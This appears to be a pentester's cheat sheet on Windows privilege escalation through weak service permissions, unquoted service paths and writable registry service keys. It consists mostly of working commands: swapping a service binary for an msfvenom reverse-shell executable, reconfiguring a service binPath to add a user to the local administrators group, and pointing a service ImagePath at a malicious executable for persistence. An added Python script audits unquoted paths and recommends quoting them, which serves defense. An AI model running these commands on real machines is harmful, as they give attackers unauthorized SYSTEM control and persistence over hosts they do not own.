Weak Permissions
Info: SharpUp can audit for weak ACLs in a single run.
.\SharpUp.exe audit
Basic Weak Permissions
icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"
# If we have write access, we can replace this binary with a malicious .exe generated with msf to get a reverse shell
# Replace & Start the Service
cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"
sc start SecurityService
# Check permissions using AccessChk
accesschk.exe /accepteula -quvcw WindscribeService
# We can change the binPath of the service to a malicious command
sc config WindscribeService binpath="cmd /c net localgroup administrators rezydev /add"
# Restart the Service
sc stop WindscribeService
sc start WindscribeService
Unquoted Service Path
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\windows\\" | findstr /i /v """
If an unquoted path such as C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe is found, Windows tries each space-delimited prefix as an executable before the full path, so we can try creating C:\Program.exe or C:\Program Files (x86)\System.exe with msfvenom to get a reverse shell as SYSTEM.
Info: We need write permission in those directories to be able to copy malicious binaries there.
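For auditing an exported service inventory, the following added example (not part of the original notes) lists, for each unquoted PathName, every path Windows would try before the real binary and the directories whose write ACLs therefore need review. It generalizes the two paths named above to all space-delimited prefixes. The service names are constructed, and the rule that `.exe` is appended only when the last component has no extension is assumed from the documented CreateProcess behaviour.

```python
import ntpath
import re

# Constructed sample inventory of (service name, PathName). Service names are
# made up; the first path is the one quoted in the text above.
SAMPLE_SERVICES = [
    ("ExampleExplorerSvc",
     r"C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe"),
    ("ExampleQuotedSvc", r'"C:\Program Files\Vendor App\svc.exe" -k run'),
    ("ExampleAgentSvc", r"C:\Tools\agent.exe --service"),
    ("ExampleDottedSvc", r"C:\Apps\My.App Suite\svc.exe"),
]

EXE_END = re.compile(r"\.exe(?=\s|$)", re.IGNORECASE)


def phantom_candidates(pathname):
    """Paths Windows would try before the real binary of an unquoted PathName."""
    cmd = pathname.strip()
    if cmd.startswith('"'):
        return []  # quoted: the executable path is unambiguous
    match = EXE_END.search(cmd)
    exe = cmd[:match.end()] if match else cmd  # drop arguments after the .exe
    candidates = []
    for i, ch in enumerate(exe):
        if ch != " " or exe[i - 1] == " ":
            continue
        prefix = exe[:i]
        # CreateProcess appends ".exe" only if the last component has no extension
        if not ntpath.splitext(prefix)[1]:
            prefix += ".exe"
        candidates.append(prefix)
    return candidates


def audit(services):
    """Map service name -> (candidate paths, directories whose ACLs to review)."""
    findings = {}
    for name, pathname in services:
        candidates = phantom_candidates(pathname)
        if candidates:
            dirs = sorted({ntpath.dirname(c) for c in candidates})
            findings[name] = (candidates, dirs)
    return findings


if __name__ == "__main__":
    for name, (candidates, dirs) in audit(SAMPLE_SERVICES).items():
        print(f"{name}: unquoted path; fix by quoting ImagePath")
        print("  would be tried first:", candidates)
        print("  review write ACLs on:", dirs)
```

Quoting the service's ImagePath removes every candidate, which is why the quoted sample entry produces no finding.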
Permissive Registry ACLs
- We can look for Weak Service ACLs in Registry:
accesschk.exe /accepteula "USER" -kvuqsw hklm\System\CurrentControlSet\services
# Modify ImagePath for persistence:
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\TARGET_SERVICE -Name "ImagePath" -Value "C:\path\to\malicious.exe"
- We may also look for Modifiable Autorun Binaries
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
## Note: Potential persistence if write access is available.